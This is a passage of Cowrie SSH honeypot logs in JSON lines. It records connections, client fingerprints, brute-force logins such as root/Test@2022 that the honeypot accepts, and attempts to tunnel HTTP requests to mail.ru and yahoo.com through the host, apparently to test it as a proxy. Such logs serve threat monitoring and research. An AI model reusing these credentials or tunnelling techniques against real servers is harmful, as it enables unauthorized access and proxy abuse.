a2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.050541Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54220,"dst_ip":"1.2.3.4","dst_port":22,"session":"488f6442384c","protocol":"ssh","message":"New connection: 212.227.235.229:54220 (1.2.3.4:22) [session: 488f6442384c]","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.154490Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.304001Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5780,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5780","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.355907Z","session":"af837eb72ef9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.406849Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.423081Z","src_ip":"212.227.235.229","session":"8a51d14d90b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":25752,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25752","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.549221Z","session":"af837eb72ef9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.600097Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":21682,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21682","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.745204Z","session":"af837eb72ef9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.796241Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.847929Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57483,"dst_ip":"1.2.3.4","dst_port":22,"session":"83b94b06204f","protocol":"ssh","message":"New connection: 77.83.207.83:57483 (1.2.3.4:22) [session: 83b94b06204f]","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.897606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.898738Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.950049Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.205208Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3019,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3019","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.257272Z","session":"83b94b06204f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.308488Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":7110,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7110","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.453578Z","session":"83b94b06204f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.504765Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.575579Z","src_ip":"212.227.235.229","session":"488f6442384c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.576483Z","src_ip":"212.227.235.229","session":"488f6442384c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":14569,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:14569","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.649829Z","session":"83b94b06204f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.702760Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.755090Z","src_ip":"77.83.207.83","session":"83b94b06204f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57577,"dst_ip":"1.2.3.4","dst_port":22,"session":"81b40588a50b","protocol":"ssh","message":"New connection: 77.83.207.83:57577 (1.2.3.4:22) [session: 81b40588a50b]","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.803880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.804561Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:48.854485Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.103283Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1968,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1968","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.153963Z","session":"81b40588a50b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.203877Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11774,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11774","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.344289Z","session":"81b40588a50b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.394203Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":27399,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27399","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.536149Z","session":"81b40588a50b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.586063Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.636853Z","src_ip":"77.83.207.83","session":"81b40588a50b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57654,"dst_ip":"1.2.3.4","dst_port":22,"session":"a90b6a1b128d","protocol":"ssh","message":"New connection: 77.83.207.83:57654 (1.2.3.4:22) [session: a90b6a1b128d]","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.686842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.687813Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.738316Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:49.989391Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21358,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21358","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.040956Z","session":"a90b6a1b128d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.091710Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31592,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31592","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.232890Z","session":"a90b6a1b128d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.283203Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":26342,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26342","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.424562Z","session":"a90b6a1b128d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.474789Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.526077Z","src_ip":"77.83.207.83","session":"a90b6a1b128d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57736,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdecfbc23502","protocol":"ssh","message":"New connection: 77.83.207.83:57736 (1.2.3.4:22) [session: fdecfbc23502]","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.575105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.584322Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.625408Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.876760Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6158,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6158","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.927739Z","session":"fdecfbc23502"}
